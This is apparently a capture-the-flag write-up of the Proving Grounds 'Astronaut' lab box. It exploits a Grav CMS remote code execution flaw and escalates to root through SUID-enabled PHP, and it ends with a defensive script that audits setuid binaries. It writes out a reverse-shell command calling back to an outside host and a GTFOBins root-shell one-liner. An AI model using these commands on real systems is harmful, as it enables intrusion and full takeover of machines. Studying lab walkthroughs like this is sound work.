Astronaut

Source: Proving Grounds
OS: Linux
Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started with autorecon as usual, which revealed two open ports on the target:

    • SSH (22)

    • HTTP (80)

Service Analysis

  • Browsing to the HTTP service led me to a Grav CMS admin interface (grav-admin).

  • I checked the robots.txt file, which listed multiple directories, but after checking them all, they led nowhere.

  • I also discovered a login page for the admin. However, default credentials didn’t work, and I noticed that accounts lock after several failed attempts, so bruteforcing wasn’t an option.

Gaining Initial Access

  • After some research, I found multiple CVEs for Grav, one of which allowed remote code execution (RCE). I found a PoC for it and tried it.

  • Initially, my attempts failed when I included a trailing “/” at the end of the target URL. Once I removed the trailing slash, the exploit worked. For instance, while this command:

python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin/

didn’t work, this one did the trick:

python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin

This allowed me to get a reverse shell on the target.


Privilege Escalation

  • Once I had shell access, I ran linpeas.sh to identify further avenues for privilege escalation.

  • The scan revealed a cron job that executed every minute, running a PHP script. I attempted to inject into this PHP script, but soon realized the file was owned by www-data, meaning the shell remained at the same privilege level.

  • Continuing my search, I ran the following command to look for SUID binaries owned by root:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

  • This command revealed that PHP itself had the SUID bit set. Checking GTFOBins provided me with the code required to exploit this. I then executed the command to escalate privileges to root:

php -r "pcntl_exec('/bin/sh', ['-p']);"

Lessons Learned

  • Exploit Error: A subtle difference in the target URL (with or without a trailing slash) can make or break an exploit.

  • SUID Misconfiguration: Misconfigured SUID permissions on the PHP binary were the path to privilege escalation.
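As an added example (not part of the original writeup), here is a small POSIX sh audit that turns the SUID lesson into a check a defender can run: it lists setuid-root files with the same find used above, flags any interpreter (such as php) carrying the bit, and reports anything outside a short allowlist of binaries that legitimately need it. The allowlist and interpreter list are illustrative assumptions, not a complete reference.

```shell
#!/bin/sh
# Audit setuid-root binaries; flag interpreters and unexpected entries.
# The two lists below are assumptions for this example, adjust per distro.

# Binaries commonly expected to be setuid root on a Debian/Ubuntu host.
ALLOWED="passwd su sudo mount umount chsh chfn gpasswd newgrp pkexec fusermount"
# Interpreters that should never carry the setuid bit: with it set, a call
# such as pcntl_exec('/bin/sh', ['-p']) keeps the elevated effective uid.
INTERPRETERS="php python perl ruby node bash sh"

# Classify one path; prints "INTERPRETER", "UNEXPECTED" or "ok" plus the path.
classify_suid() {
    name=${1##*/}                                     # /usr/bin/php7.4 -> php7.4
    base=$(printf '%s' "$name" | sed 's/[0-9.]*$//')  # php7.4 -> php
    for i in $INTERPRETERS; do
        if [ "$base" = "$i" ]; then
            printf 'INTERPRETER %s\n' "$1"
            return 0
        fi
    done
    for a in $ALLOWED; do
        if [ "$name" = "$a" ]; then
            printf 'ok %s\n' "$1"
            return 0
        fi
    done
    printf 'UNEXPECTED %s\n' "$1"
}

# Read one path per line on stdin (e.g. find output) and classify each.
audit_suid_list() {
    while IFS= read -r p; do
        if [ -n "$p" ]; then
            classify_suid "$p"
        fi
    done
}

# Live audit of the host: same find as the writeup, paths only, then classify.
audit_suid_host() {
    find / -user root -perm -4000 -type f 2>/dev/null | audit_suid_list
}

# Remediation for a flagged interpreter is to drop the bit: chmod u-s <path>
```

Run audit_suid_host as root on a host to get the report; feed a saved find listing into audit_suid_list to audit offline.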
